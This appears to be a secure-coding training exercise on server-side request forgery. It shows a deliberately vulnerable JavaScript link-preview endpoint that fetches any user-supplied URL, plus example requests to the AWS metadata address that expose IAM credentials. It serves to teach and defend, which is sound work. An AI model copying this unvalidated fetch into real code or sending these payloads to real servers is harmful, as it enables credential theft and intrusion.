/Code Review/SSRF in URL Preview

SSRF in URL Preview

Server-side request forgery through unvalidated URL fetching for link previews.

CRITICALHard

Vulnerable Codejavascript

1app.post('/api/preview', async (req, res) => {
2    const { url } = req.body;
3    
4    try {
5        const response = await fetch(url);
6        const html = await response.text();
7        
8        const title = html.match(/<title>(.*?)<\/title>/)?.[1];
9        const desc = html.match(/meta name="description" content="(.*?)"/)?.[1];
10        
11        res.json({ title, description: desc });
12    } catch (error) {
13        res.status(500).json({ error: 'Failed to fetch URL' });
14    }
15});

Understanding the Issue

The server fetches any URL provided by the user without validation. An attacker can use this to access internal services (e.g., http://localhost:8080/admin), cloud metadata endpoints (http://169.254.169.254), or scan internal networks.

AWS Metadata Endpoint Access

Attacker uses SSRF to steal cloud credentials

Malicious Input

POST /api/preview
{
  "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
}

Impact

Response reveals AWS role name, then:

POST /api/preview
{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/MyRole"}

{
  "AccessKeyId": "AKIAIOSFODNN7EXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/...",
  "Token": "..."
}

✓ Full AWS credentials exposed
✓ Attacker can access S3, EC2, etc.

Technical Details

Vulnerability Type: Server-Side Request Forgery
Severity: CRITICAL
Language: Javascript
CWE: CWE-918
OWASP: A10:2021 - SSRF

SSRF in URL Preview

Understanding the Issue

How Attackers Exploit This

AWS Metadata Endpoint Access

Finding the Vulnerability(3 hints)

Technical Details

SSRF in URL Preview

Understanding the Issue

How Attackers Exploit This

AWS Metadata Endpoint Access

Finding the Vulnerability(3 hints)

Technical Details